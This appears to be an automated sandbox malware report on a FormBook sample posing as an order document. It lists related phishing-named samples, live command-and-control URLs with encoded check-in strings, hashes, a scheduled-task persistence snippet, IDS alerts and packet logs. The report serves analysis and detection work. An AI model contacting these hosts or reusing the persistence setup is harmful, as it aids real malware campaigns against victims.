	PO_210222.exe	Get hash	malicious	Browse	www.kspindustries.com/dka/?9rYD4D2P=9WUKE20VMOTsgTPOGG+gM7wMKgTDQQYKjBu36Jx5uNlLi85Jvnz4VQqFTS3DYsDMhKcM&4h=vTxdADNprBU8ur
	Order83930.exe	Get hash	malicious	Browse	www.worksmade.com/pkfa/?kRm0q=AeLHm4krJ5cZleWXJ7DbkRDB3iMf+mbqkQIEvPdjRXBov8eOMTfw1ykaYqt0P2yYW1wd&P0D=AdpLplk
	DHL eInvoice_Pdf.exe	Get hash	malicious	Browse	www.lovethybodi.com/dll/?Ezrt7H=XrITfbQx&rJET96=VZxax5Ji0ayI+hrvRc8xbN6ADZocsLe3YiHwLknRP/O6fJJXAg3ZXgaLGnTQhcDUXCIi
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	www.sioosi.com/idir/?jFNhC=BAdMNhCaU+7u9XJaCO3iV4C5aA0TCLj07dpBj0L8TrCXQaq7x7/wZRF1tJRJ0mfI3EQomiZFcg==&PlHT0=_6g89p5H3xehg
	rad875FE.tmp.exe	Get hash	malicious	Browse	fdmail85.club/serverstat315/
	SecuriteInfo.com.Trojan.Inject4.6572.17143.exe	Get hash	malicious	Browse	www.buyers-connection.com/mt6e/?T8e0dp=hLmMffsGgwjrW5RZdYCH6mddSm2W9hJJfHEwGoyKmHJo5/xZlUyZeqeg++L426DpjyYm&Fx=3fdx_dt
	DHL Document. PDF.exe	Get hash	malicious	Browse	www.thebrowbandit.info/d8ak/?Szr0s4=zH7+TMUEa66ds4LUG5QkV+A8HFZNfwJlYCtch+3uZ/cbqgmlMO3qxYa4o/rgt+cFNwefcp2wvw==&QL3=uTyTqJdh5XE07
	eInvoice.exe	Get hash	malicious	Browse	www.cyberxchange.net/dll/?alI=J6AlYtFHR6r&DxlLi=O16Cpvehw381JgOcsiBVvt6SNBXVOB+15MfeRQ6rIhocO090ZFQOuEsCZWtNgYTmelCy
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	www.beasley.digital/gypo/?UrjPuprX=M7Hk14MLzXe1S9acHT7ZsieFPBYG9bGpGcbZ4ICPUuDVYKBFzTViR4JE6d+ne5phLrjWAg==&nnLx=UBZp3XKPefjxdB
	Outstanding Invoices.pdf.exe	Get hash	malicious	Browse	www.arescsg.com/ocq1/?Bl=lHLLrF4h72F&ITrHi2v=QNjT++wY9a5zCVAjoE7Ie93o6MHPk5lGE/qlj9tP3aNbcRLbl33t+j0E2POpmVTB9EfC
	PDF.exe	Get hash	malicious	Browse	www.sevendeepsleep.com/ujg4/?Ktz4q=vVYHGFhESmr0MhafV2r1epXRiWHZKHpqHzgNJrSdHWrYUNDGZWFgSG6u51EUVnN8n2QK&tTrL=ApdhXrS
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	www.scanourworld.com/nsag/?ixlp=RjpY/w7V4Gns1L0rMkaS4a7cxyPO11vhmKSgl8HqKcRxVLLhONg71u8j186CVYVfR9NOyw==&3f=7nD434
	(G0170-PF3F-20-0260)2T.exe	Get hash	malicious	Browse	www.midnightblueinc.com/2kf/?-ZotnB1=PuGWiF25ErpS8LxGcVT732T32YJ8ljB4Nen33bTYqCA1w1k4pKKXZiLEs+9S++zZpoCcFtK2bw==&2d=oneDfP
	RdLlHaxEKP.exe	Get hash	malicious	Browse	www.royalpetcanvas.com/dyt/?T6AH=NhjxntVXuOKv8VzGSZxWT+wjSfPb58K86TJrQp8bJ11pPHhqBmicI70lfwP4sRyRZd3a&wPT=lf5X
	7R29qUuJef.exe	Get hash	malicious	Browse	www.gdsjgf.com/bw82/?RX=dn9dSBwpLLodPRy&YliL=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXZLtdUJUmSqf
	Drawings2.exe	Get hash	malicious	Browse	www.threebearstoronto.com/e68n/?t8l=FrFLaXJ&OXXTJ=rmAZCyc7Ns5evfiyA1QxM7ECDhDtKxCV7gbVr6Kinm6bQxm9MNnkIGnVyVwusC/d0JpN

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.233.225.185.cname-url.com	http://txfc58.com/wordpress/m2utbn-3ft4c-07947/	Get hash	malicious	Browse	23.225.123.149
shops.myshopify.com	ORDER LIST.xlsx	Get hash	malicious	Browse	23.227.38.74
	PO_210222.exe	Get hash	malicious	Browse	23.227.38.74
	SecuriteInfo.com.Trojan.Inject4.6572.10651.exe	Get hash	malicious	Browse	23.227.38.74
	SecuriteInfo.com.Trojan.Inject4.6572.17143.exe	Get hash	malicious	Browse	23.227.38.74
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	23.227.38.74
	PDF.exe	Get hash	malicious	Browse	23.227.38.74
	D6ui5xr64I.exe	Get hash	malicious	Browse	23.227.38.74
	Drawings.xlsm	Get hash	malicious	Browse	23.227.38.74
	Purchase order.exe	Get hash	malicious	Browse	23.227.38.74
	AgroAG008021921doc_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	IMG_7189012.exe	Get hash	malicious	Browse	23.227.38.74
	DHL Shipment Notification 7465649870,pdf.exe	Get hash	malicious	Browse	23.227.38.74
	HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe	Get hash	malicious	Browse	23.227.38.74
	DHL Shipment Notification 7465649870.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	q9xB9DE3RA.exe	Get hash	malicious	Browse	23.227.38.74
	51BfqRtUI9.exe	Get hash	malicious	Browse	23.227.38.74
	PO copy.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ 2-16-2021-.exe	Get hash	malicious	Browse	23.227.38.74
	NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exe	Get hash	malicious	Browse	23.227.38.74
	WAFPASSION + PDA_NOTICE.xlsx	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	po.exe	Get hash	malicious	Browse	129.226.58.179
	infected.apk	Get hash	malicious	Browse	129.226.107.80
	infected.apk	Get hash	malicious	Browse	129.226.107.80
	#U56fd#U5bb6#U961f.vmp.exe	Get hash	malicious	Browse	203.205.235.81
	KROS Sp. z.o.o.exe	Get hash	malicious	Browse	119.28.5.87
	KROS Sp. z.o.o.exe	Get hash	malicious	Browse	119.28.5.87
	po.exe	Get hash	malicious	Browse	129.226.58.179
	M1t8Jk185a.exe	Get hash	malicious	Browse	119.28.6.251
	Mensaje-22-012021.doc	Get hash	malicious	Browse	124.156.135.253
	certificado.doc	Get hash	malicious	Browse	101.32.209.55
	file.doc	Get hash	malicious	Browse	124.156.135.253
	IFS_1.0.69.apk	Get hash	malicious	Browse	129.226.103.217
	IFS_1.0.69.apk	Get hash	malicious	Browse	129.226.103.12
	adware_beauty.apk	Get hash	malicious	Browse	129.226.103.217
	flashplayerpp_install_cn (1).exe	Get hash	malicious	Browse	211.152.136.89
	Mv Maersk Kleven V949E_pdf.exe	Get hash	malicious	Browse	119.28.17.183
	Doc.doc	Get hash	malicious	Browse	124.156.117.232
	JI35907_2020.doc	Get hash	malicious	Browse	124.156.117.232
	DATI 2020.doc	Get hash	malicious	Browse	124.156.117.232
	TZ8322852306TL.doc	Get hash	malicious	Browse	129.226.14.227
GOOGLEUS	crypted.exe	Get hash	malicious	Browse	216.239.32.21
	NewOrder.xlsm	Get hash	malicious	Browse	34.102.136.180
	Order_20180218001.exe	Get hash	malicious	Browse	34.102.136.180
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	34.102.136.180
	SOA.exe	Get hash	malicious	Browse	35.186.238.101
	ORDER LIST.xlsx	Get hash	malicious	Browse	34.102.136.180
	File Downloader [14.5].apk	Get hash	malicious	Browse	142.250.186.74
	PO_210222.exe	Get hash	malicious	Browse	34.102.136.180
	Order83930.exe	Get hash	malicious	Browse	34.102.136.180
	unmapped_executable_of_polyglot_duke.dll	Get hash	malicious	Browse	216.239.32.21
	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	142.250.186.33
	DHL eInvoice_Pdf.exe	Get hash	malicious	Browse	34.102.136.180
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	34.102.136.180
	xerox for hycite.htm	Get hash	malicious	Browse	142.250.186.33
	rad875FE.tmp.exe	Get hash	malicious	Browse	34.102.136.180
	SecuriteInfo.com.Trojan.Inject4.6572.17143.exe	Get hash	malicious	Browse	34.102.136.180
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	35.200.172.247
	X1(1).xlsm	Get hash	malicious	Browse	142.250.186.66
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	35.200.172.247
	fedex.apk	Get hash	malicious	Browse	142.250.186.138
UNIFIEDLAYER-AS-1US	PO-A2174679-06.exe	Get hash	malicious	Browse	192.185.78.145
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	108.167.156.42
	CV-JOB REQUEST______PDF.EXE	Get hash	malicious	Browse	192.185.181.49
	PO.exe	Get hash	malicious	Browse	192.185.0.218
	Complaint-1091191320-02182021.xls	Get hash	malicious	Browse	192.185.16.95
	ESCANEAR_FACTURA-20794564552_docx.exe	Get hash	malicious	Browse	162.214.158.75
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	192.185.46.55
	iAxkn PDF.exe	Get hash	malicious	Browse	192.185.100.181
	carta de pago pdf.exe	Get hash	malicious	Browse	192.185.5.166
	PO.exe	Get hash	malicious	Browse	108.179.232.42
	payment details.pdf.exe	Get hash	malicious	Browse	50.87.95.32
	new order.exe	Get hash	malicious	Browse	108.179.232.42
	CV-JOB REQUEST______pdf.exe	Get hash	malicious	Browse	192.185.181.49
	RdLlHaxEKP.exe	Get hash	malicious	Browse	162.214.184.71
	Drawings2.exe	Get hash	malicious	Browse	198.57.247.220
	EFT Remittance.xls	Get hash	malicious	Browse	162.241.120.180
	Remittance Advice.xls	Get hash	malicious	Browse	162.241.120.180
	Complaint_Letter_1212735678-02192021.xls	Get hash	malicious	Browse	192.185.17.119
	Complaint_Letter_1212735678-02192021.xls	Get hash	malicious	Browse	192.185.17.119
	SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exe	Get hash	malicious	Browse	162.241.194.14

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER SPECIFICATIONS.exe.log Download File
Process:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmpDA15.tmp Download File
Process:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1644
Entropy (8bit):	5.1713595838000685
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBbtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3D
MD5:	655B601E240FE8E0C83DABE6037B8A13
SHA1:	A80DA09FA0A2141145E2BB0A55CD0BE796BCC7A1
SHA-256:	8410B13023E7E02C7A196F7104F913C19E8D99E2FE7220CD85AA496D15C0BE85
SHA-512:	3C4DAE9D022AEFC9354E595A020CBD0E5D938493A2BAA3B7A871B515674F68EA0A6BB634692F2926FD132EC8AB22BB3B867F11F9231EFFD5ED6C0E45CFB22F81
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t

C:\Users\user\AppData\Roaming\LvZiFDk.exe Download File
Process:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	552448
Entropy (8bit):	7.441638759834839
Encrypted:	false
SSDEEP:	12288:EkPa0YM/0rvX7/ozV2peyq6nnQHyCfGofwabvIZy:Dascr2wQv0oB4ab0y
MD5:	E75A4DF51162401B21C3EB79718FB3DB
SHA1:	3328EAD22DB03CE461CB8BDB5D59638120E2444F
SHA-256:	48709C3E07C128283D9D550331D6E5F7C4AFEADFC61CAD94D769EA8CE7399E77
SHA-512:	316D9088ACABC1BC7FA003BF0E5D8F03E96F8242441B264984E317126DBFA2745DB557338D34D96CEFB18228D00E1B28126D066FD06A810F7B8F485932D23307
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 15%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kM4`..............P..P...........o... ........@.. ....................................@..................................o..O.................................................................................... ............... ..H............text....O... ...P.................. ..`.rsrc................R..............@..@.reloc...............l..............@..B.................o......H........x...S..........................................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Users\user\AppData\Roaming\LvZiFDk.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.441638759834839
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ORDER SPECIFICATIONS.exe
File size:	552448
MD5:	e75a4df51162401b21c3eb79718fb3db
SHA1:	3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256:	48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
SHA512:	316d9088acabc1bc7fa003bf0e5d8f03e96f8242441b264984e317126dbfa2745db557338d34d96cefb18228d00e1b28126d066fd06a810f7b8f485932d23307
SSDEEP:	12288:EkPa0YM/0rvX7/ozV2peyq6nnQHyCfGofwabvIZy:Dascr2wQv0oB4ab0y
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kM4`..............P..P...........o... ........@.. ....................................@................................

File Icon


Icon Hash:	0563734bfff3e3a1

Static PE Info

General
Entrypoint:	0x476fee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60344D6B [Tue Feb 23 00:33:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x76f9c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x78000	0x118a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x74ff4	0x75000	False	0.752839960604	data	7.43400315564	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x78000	0x118a0	0x11a00	False	0.445187832447	data	5.81195077759	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x78130	0x10828	data
RT_GROUP_ICON	0x88958	0x14	data
RT_VERSION	0x8896c	0x324	data
RT_MANIFEST	0x88c90	0xc0f	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	ObjectMap.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	RegisterVB
ProductVersion	1.0.0.0
FileDescription	RegisterVB
OriginalFilename	ObjectMap.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-08:57:55.635872	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.5	34.102.136.180
02/23/21-08:57:55.635872	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.5	34.102.136.180
02/23/21-08:57:55.635872	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.5	34.102.136.180
02/23/21-08:57:55.775060	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49731	34.102.136.180	192.168.2.5
02/23/21-08:58:17.613406	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.5	34.90.54.238
02/23/21-08:58:17.613406	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.5	34.90.54.238
02/23/21-08:58:17.613406	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.5	34.90.54.238
02/23/21-08:58:22.815170	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.5	34.102.136.180
02/23/21-08:58:22.815170	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.5	34.102.136.180
02/23/21-08:58:22.815170	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.5	34.102.136.180
02/23/21-08:58:22.954350	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	34.102.136.180	192.168.2.5
02/23/21-08:58:59.639218	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49740	23.227.38.74	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:57:44.081270933 CET	49729	80	192.168.2.5	50.87.196.120
Feb 23, 2021 08:57:44.267616987 CET	80	49729	50.87.196.120	192.168.2.5
Feb 23, 2021 08:57:44.267728090 CET	49729	80	192.168.2.5	50.87.196.120
Feb 23, 2021 08:57:44.267937899 CET	49729	80	192.168.2.5	50.87.196.120
Feb 23, 2021 08:57:44.452924967 CET	80	49729	50.87.196.120	192.168.2.5
Feb 23, 2021 08:57:44.464051008 CET	80	49729	50.87.196.120	192.168.2.5
Feb 23, 2021 08:57:44.464297056 CET	80	49729	50.87.196.120	192.168.2.5
Feb 23, 2021 08:57:44.464313030 CET	49729	80	192.168.2.5	50.87.196.120
Feb 23, 2021 08:57:44.464510918 CET	49729	80	192.168.2.5	50.87.196.120
Feb 23, 2021 08:57:44.651365995 CET	80	49729	50.87.196.120	192.168.2.5
Feb 23, 2021 08:57:50.103084087 CET	49730	80	192.168.2.5	170.106.171.56
Feb 23, 2021 08:57:50.306849957 CET	80	49730	170.106.171.56	192.168.2.5
Feb 23, 2021 08:57:50.307043076 CET	49730	80	192.168.2.5	170.106.171.56
Feb 23, 2021 08:57:50.307199955 CET	49730	80	192.168.2.5	170.106.171.56
Feb 23, 2021 08:57:50.510967970 CET	80	49730	170.106.171.56	192.168.2.5
Feb 23, 2021 08:57:50.513550997 CET	80	49730	170.106.171.56	192.168.2.5
Feb 23, 2021 08:57:50.513581991 CET	80	49730	170.106.171.56	192.168.2.5
Feb 23, 2021 08:57:50.513596058 CET	80	49730	170.106.171.56	192.168.2.5
Feb 23, 2021 08:57:50.513766050 CET	49730	80	192.168.2.5	170.106.171.56
Feb 23, 2021 08:57:50.513847113 CET	49730	80	192.168.2.5	170.106.171.56
Feb 23, 2021 08:57:50.516586065 CET	49730	80	192.168.2.5	170.106.171.56
Feb 23, 2021 08:57:50.720447063 CET	80	49730	170.106.171.56	192.168.2.5
Feb 23, 2021 08:57:55.594748020 CET	49731	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:57:55.635528088 CET	80	49731	34.102.136.180	192.168.2.5
Feb 23, 2021 08:57:55.635716915 CET	49731	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:57:55.635871887 CET	49731	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:57:55.676275969 CET	80	49731	34.102.136.180	192.168.2.5
Feb 23, 2021 08:57:55.775059938 CET	80	49731	34.102.136.180	192.168.2.5
Feb 23, 2021 08:57:55.775103092 CET	80	49731	34.102.136.180	192.168.2.5
Feb 23, 2021 08:57:55.775355101 CET	49731	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:57:55.775441885 CET	49731	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:57:55.815941095 CET	80	49731	34.102.136.180	192.168.2.5
Feb 23, 2021 08:58:01.040714025 CET	49732	80	192.168.2.5	156.240.32.114
Feb 23, 2021 08:58:01.260431051 CET	80	49732	156.240.32.114	192.168.2.5
Feb 23, 2021 08:58:01.264575005 CET	49732	80	192.168.2.5	156.240.32.114
Feb 23, 2021 08:58:01.264838934 CET	49732	80	192.168.2.5	156.240.32.114
Feb 23, 2021 08:58:01.483952999 CET	80	49732	156.240.32.114	192.168.2.5
Feb 23, 2021 08:58:01.486218929 CET	80	49732	156.240.32.114	192.168.2.5
Feb 23, 2021 08:58:01.486253023 CET	80	49732	156.240.32.114	192.168.2.5
Feb 23, 2021 08:58:01.486402988 CET	49732	80	192.168.2.5	156.240.32.114
Feb 23, 2021 08:58:01.486474991 CET	49732	80	192.168.2.5	156.240.32.114
Feb 23, 2021 08:58:01.705612898 CET	80	49732	156.240.32.114	192.168.2.5
Feb 23, 2021 08:58:06.594165087 CET	49734	80	192.168.2.5	13.57.130.120
Feb 23, 2021 08:58:06.797530890 CET	80	49734	13.57.130.120	192.168.2.5
Feb 23, 2021 08:58:06.797717094 CET	49734	80	192.168.2.5	13.57.130.120
Feb 23, 2021 08:58:06.798021078 CET	49734	80	192.168.2.5	13.57.130.120
Feb 23, 2021 08:58:07.001307964 CET	80	49734	13.57.130.120	192.168.2.5
Feb 23, 2021 08:58:07.001431942 CET	80	49734	13.57.130.120	192.168.2.5
Feb 23, 2021 08:58:07.001451015 CET	80	49734	13.57.130.120	192.168.2.5
Feb 23, 2021 08:58:07.001702070 CET	49734	80	192.168.2.5	13.57.130.120
Feb 23, 2021 08:58:07.001868963 CET	49734	80	192.168.2.5	13.57.130.120
